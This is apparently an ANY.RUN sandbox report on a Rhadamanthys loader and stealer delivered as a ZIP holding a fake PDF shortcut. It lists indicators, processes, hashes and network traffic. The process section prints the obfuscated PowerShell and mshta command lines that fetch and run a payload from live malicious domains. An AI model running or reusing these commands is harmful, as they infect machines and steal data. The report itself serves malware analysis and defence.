Malware analysis 3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee Malicious activity

Add for printing

File name:	3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee
Full analysis:	https://app.any.run/tasks/bddbf4f2-7a0c-407a-b568-277a8a3c5cef
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	September 06, 2024, 23:28:50
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	exploit cve-2017-0199 github loader rhadamanthys stealer
Indicators:
MIME:	application/zip
File info:	Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:	299FF5995CD11BF00A433447EC6FC9EA
SHA1:	06762CF9EA908DB9E888D4270014EC28722E877B
SHA256:	3106463200B3CFEA89B7F8EF164EA9EE208EC3A48A42407C5AA73BFF7BAB25EE
SSDEEP:	1536:JwJPR/OZr76tZDzjcpV+Vwaq6MTi/nkf0oWlSRSarbsRVsv2nUT:0J/krWtZDvoVopwTi/n+6SPrCVM2nQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Changes powershell execution policy (Unrestricted)
  - WinRAR.exe (PID: 3316)
  - mshta.exe (PID: 644)
- EXPLOIT has been detected (SURICATA)
  - mshta.exe (PID: 644)
- Starts Visual C# compiler
  - XT10.exe (PID: 5704)
- RHADAMANTHYS has been detected (SURICATA)
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 3184)
- Changes the autorun value in the registry
  - XT10.exe (PID: 5704)
- Stealers network behavior
  - OOBE-Maintenance.exe (PID: 2572)
- Actions looks like stealing of personal data
  - OOBE-Maintenance.exe (PID: 2572)
SUSPICIOUS
- Probably obfuscated PowerShell command line is found
  - WinRAR.exe (PID: 3316)
- Starts POWERSHELL.EXE for commands execution
  - WinRAR.exe (PID: 3316)
  - mshta.exe (PID: 644)
- Gets or sets the security protocol (POWERSHELL)
  - powershell.exe (PID: 3184)
- Probably download files using WebClient
  - mshta.exe (PID: 644)
- Powershell scripting: start process
  - mshta.exe (PID: 644)
- Block-list domains
  - mshta.exe (PID: 644)
  - powershell.exe (PID: 3184)
- Reads security settings of Internet Explorer
  - WinRAR.exe (PID: 3316)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 3184)
- Process requests binary or script from the Internet
  - powershell.exe (PID: 3184)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3184)
- Runs shell command (SCRIPT)
  - mshta.exe (PID: 644)
- Contacting a server suspected of hosting an CnC
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- The process checks if it is being run in the virtual environment
  - OpenWith.exe (PID: 1432)
- Connects to unusual port
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Potential Corporate Privacy Violation
  - powershell.exe (PID: 3184)
- Loads DLL from Mozilla Firefox
  - OOBE-Maintenance.exe (PID: 2572)
- Searches for installed software
  - OOBE-Maintenance.exe (PID: 2572)
INFO
- The process uses the downloaded file
  - WinRAR.exe (PID: 3316)
  - mshta.exe (PID: 644)
  - powershell.exe (PID: 3184)
  - WINWORD.EXE (PID: 6592)
- Create files in a temporary directory
  - powershell.exe (PID: 4688)
- Reads Internet Explorer settings
  - mshta.exe (PID: 644)
- Reads the software policy settings
  - powershell.exe (PID: 4688)
- Checks proxy server information
  - mshta.exe (PID: 644)
  - powershell.exe (PID: 3184)
- Reads security settings of Internet Explorer
  - powershell.exe (PID: 4688)
- Disables trace logs
  - powershell.exe (PID: 3184)
- Manual execution by a user
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Sends debugging messages
  - WINWORD.EXE (PID: 6592)
- The executable file from the user directory is run by the Powershell process
  - XT10.exe (PID: 5704)
- Reads the computer name
  - csc.exe (PID: 360)
  - setup_wm.exe (PID: 6412)
- Checks supported languages
  - XT10.exe (PID: 5704)
  - csc.exe (PID: 360)
  - setup_wm.exe (PID: 6412)
- Reads the machine GUID from the registry
  - setup_wm.exe (PID: 6412)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.zip	\|	ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion:	20
ZipBitFlag:	-
ZipCompression:	Deflated
ZipModifyDate:	2024:09:05 15:35:24
ZipCRC:	0x4c823ccd
ZipCompressedSize:	871
ZipUncompressedSize:	2780
ZipFileName:	Anytime Fitness.pdf.lnk

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

147

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

360

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

—

XT10.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Visual C# Command Line Compiler

Exit code:

Version:

4.8.9037.0 built by: NET481REL1

Modules

Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll

644

"C:\WINDOWS\system32\mshta.exe" http://gg.gg/1bzm37

C:\Windows\System32\mshta.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) HTML Application host

Exit code:

Version:

11.00.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll

1432

"C:\WINDOWS\system32\openwith.exe"

C:\Windows\SysWOW64\OpenWith.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Pick an app

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll

2256

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

2572

"C:\WINDOWS\system32\OOBE-Maintenance.exe"

C:\Windows\System32\OOBE-Maintenance.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

OOBE-Maintenance

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\oobe-maintenance.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\shcore.dll

3184

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function UVhyeI($mAhhd, $mNaZaE){[IO.File]::WriteAllBytes($mAhhd, $mNaZaE)};function qzhjG($mAhhd){if($mAhhd.EndsWith((QnajIUKq @(46055,46109,46117,46117))) -eq $True){Start-Process (QnajIUKq @(46123,46126,46119,46109,46117,46117,46060,46059,46055,46110,46129,46110)) $mAhhd}else{Start-Process $mAhhd}};function RxRdDZpG($hWKZQlYFV){$eUcfgkDy = New-Object (QnajIUKq @(46087,46110,46125,46055,46096,46110,46107,46076,46117,46114,46110,46119,46125));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$mNaZaE = $eUcfgkDy.DownloadData($hWKZQlYFV);return $mNaZaE};function QnajIUKq($kKmXB){$bvIBCmt=46009;$JgXiRx=$Null;foreach($dTERC in $kKmXB){$JgXiRx+=[char]($dTERC-$bvIBCmt)};return $JgXiRx};function WNDRQYXK(){$IOFHo = $env:APPDATA + '\';$IuFrsiq = RxRdDZpG (QnajIUKq @(46113,46125,46125,46121,46124,46067,46056,46056,46112,46114,46125,46113,46126,46107,46055,46108,46120,46118,46056,46124,46123,46125,46106,46120,46107,46106,46119,46113,46057,46065,46065,46056,46054,46129,46110,46118,46109,46110,46121,46125,46123,46106,46114,46056,46123,46106,46128,46056,46118,46106,46114,46119,46056,46075,46110,46106,46108,46113,46046,46059,46057,46076,46114,46125,46130,46046,46059,46057,46075,46106,46124,46110,46107,46106,46117,46117,46046,46059,46057,46074,46108,46106,46109,46110,46118,46130,46055,46109,46120,46108,46129));$DqHRIIOZ = $IOFHo + 'Beach%20City%20Baseball%20Academy.docx';UVhyeI $DqHRIIOZ $IuFrsiq;qzhjG $DqHRIIOZ;;$csZcFtK = RxRdDZpG (QnajIUKq @(46113,46125,46125,46121,46067,46056,46056,46126,46116,46119,46120,46128,46119,46106,46107,46120,46109,46110,46055,46109,46126,46108,46116,46109,46119,46124,46055,46120,46123,46112,46056,46113,46123,46120,46128,46056,46097,46093,46058,46057,46055,46110,46129,46110));$gcvAJC = $IOFHo + 'XT10.exe';UVhyeI $gcvAJC $csZcFtK;qzhjG $gcvAJC;;;}WNDRQYXK;

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mshta.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll

3316

"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee.zip

C:\Program Files\WinRAR\WinRAR.exe

—

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

3812

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

OOBE-Maintenance.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4688

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $L=':b/3aT7mhMl1st.pgz'; &(-join($L[(306-294),(461-457),(-474+484)])) \= (-join($L[(306-294),(461-457),(-474+484)])); \= $\ (-join($L[(-893+900),(306-294),(316-308),(-207+212),(461-457)])); foreach($r in @((714-706),(334-321),(-371+384),(747-732),(194-194),(-549+551),(191-189),(-107+123),(477-461),(-397+411),(-227+243),(-160+176),(-391+393),(628-617),(219-218),(301-284),(686-679),(-262+265),(-894+900))){$m+=$L[$r]}; $\ $m;

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

WinRAR.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5704

"C:\Users\admin\AppData\Roaming\XT10.exe"

C:\Users\admin\AppData\Roaming\XT10.exe

powershell.exe

User:

admin

Company:

BioWare Corp.

Integrity Level:

MEDIUM

Description:

Star Wars: Knights of the Old Republic

Exit code:

Version:

1, 0, 3, 0

Modules

Images
c:\users\admin\appdata\roaming\xt10.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll

Add for printing

Total events

30 499

Read events

30 077

Write events

396

Delete events

Modification events


(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\AppData\Local\Temp\3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee.zip
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:	(644) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(644) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(644) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:

Add for printing

Executable files

Suspicious files

124

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
4688	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3K8DBWSQSGWZW6OJX1V.temp		binary
		MD5:7650CB99CFDC2479385A34C5C1C87A0B	SHA256:F840C4EE836BFA7A18982576A3E0B4D79E853D4F8AF83FD94B56A67F8E4C75EE
4688	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d230884016481bd4.customDestinations-ms		binary
		MD5:7650CB99CFDC2479385A34C5C1C87A0B	SHA256:F840C4EE836BFA7A18982576A3E0B4D79E853D4F8AF83FD94B56A67F8E4C75EE
3184	powershell.exe	C:\Users\admin\AppData\Roaming\Beach%20City%20Baseball%20Academy.docx		document
		MD5:003540E3D195D2D53381F50B8EA82606	SHA256:ADE9B45BAE2951B595E7197E828CB0F86AA49C7EBB078A2DD8FDB16BAEC8F7BF
4688	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tm1024ss.t1j.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3316	WinRAR.exe	C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.14888\Anytime Fitness.pdf.lnk		lnk
		MD5:3C3D769913AA7BA07891534B8604DF80	SHA256:3D8F84AAF7BE169BC77E06EF4B80816CEFF61E8316E86C392F1A1B4F19D1EEF5
4688	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:971F94D760A267703E1A1C11877AE7C8	SHA256:FCE9E231FC18A7FFBD4871AC613A90271823BA37852CE033E58127C8F76C8870
4688	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wcmrzfkd.uba.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6592	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres		binary
		MD5:E4FE0C0F6528C64F514834D9D9E3EA09	SHA256:3871355F7D768D1B0E52660E3E1C4C2879D64F018ACF8B15A26BE70F6473BC27
6592	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\972C5173-E259-4157-BE08-0C43FB47AEA4		xml
		MD5:E8ABC981236D760356096E0C1D16AF85	SHA256:267813A004523FFA13FC86F2137C90EA3FE7905C764C8D93300C488792ECF995
6592	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		binary
		MD5:2CA09C86EBAE01B3CE825AADEBF15FAD	SHA256:14E5B2F05619F894C5438F412A308B2FD54A9379557DBCCD8CEBB7979A10EF07

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
644	mshta.exe	GET	301	91.215.42.31:80	http://gg.gg/1bzm37	unknown	—	—	shared
644	mshta.exe	GET	200	94.154.172.166:80	http://uknownabode.duckdns.org/hrow/example.hta	unknown	—	—	malicious
4132	svchost.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
3184	powershell.exe	GET	200	94.154.172.166:80	http://uknownabode.duckdns.org/hrow/XT10.exe	unknown	—	—	malicious
1332	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D	unknown	—	—	whitelisted
6212	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6212	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
6288	RUXIMICS.exe	4.231.128.59:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
2120	MoUsoCoreWorker.exe	4.231.128.59:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4132	svchost.exe	4.231.128.59:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
644	mshta.exe	91.215.42.31:80	gg.gg	Ddos-guard Ltd	RU	shared
644	mshta.exe	94.154.172.166:80	uknownabode.duckdns.org	Enes Koken	US	malicious
4132	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4132	svchost.exe	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted
3184	powershell.exe	140.82.121.3:443	github.com	GITHUB	US	shared

DNS requests

Domain	IP	Reputation
google.com	216.58.206.46	whitelisted
gg.gg	91.215.42.31	shared
uknownabode.duckdns.org	94.154.172.166	malicious
settings-win.data.microsoft.com	51.104.136.2 40.127.240.158 20.73.194.208	whitelisted
www.microsoft.com	95.101.149.131 184.30.21.171	whitelisted
github.com	140.82.121.3	shared
raw.githubusercontent.com	185.199.110.133 185.199.111.133 185.199.108.133 185.199.109.133	shared
officeclient.microsoft.com	52.109.32.97	whitelisted
ecs.office.com	52.113.194.132	whitelisted
omex.cdn.office.net	2.19.126.160 2.19.126.151	whitelisted

Threats

PID	Process	Class	Message
2256	svchost.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
2256	svchost.exe	Misc activity	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2256	svchost.exe	Misc activity	ET INFO GG Url Shortener Observed in DNS Query
644	mshta.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain
644	mshta.exe	Potentially Bad Traffic	ET POLICY Possible HTA Application Download
644	mshta.exe	Attempted User Privilege Gain	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
644	mshta.exe	A Network Trojan was detected	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
2256	svchost.exe	Not Suspicious Traffic	INFO [ANY.RUN] Attempting to access raw user content on GitHub
3184	powershell.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain
3184	powershell.exe	Misc activity	ET INFO Packed Executable Download

6 ETPRO signatures available at the full report

Add for printing

Process	Message
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.

General Info

3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee

299FF5995CD11BF00A433447EC6FC9EA

06762CF9EA908DB9E888D4270014EC28722E877B

3106463200B3CFEA89B7F8EF164EA9EE208EC3A48A42407C5AA73BFF7BAB25EE

1536:JwJPR/OZr76tZDzjcpV+Vwaq6MTi/nkf0oWlSRSarbsRVsv2nUT:0J/krWtZDvoVopwTi/n+6SPrCVM2nQ

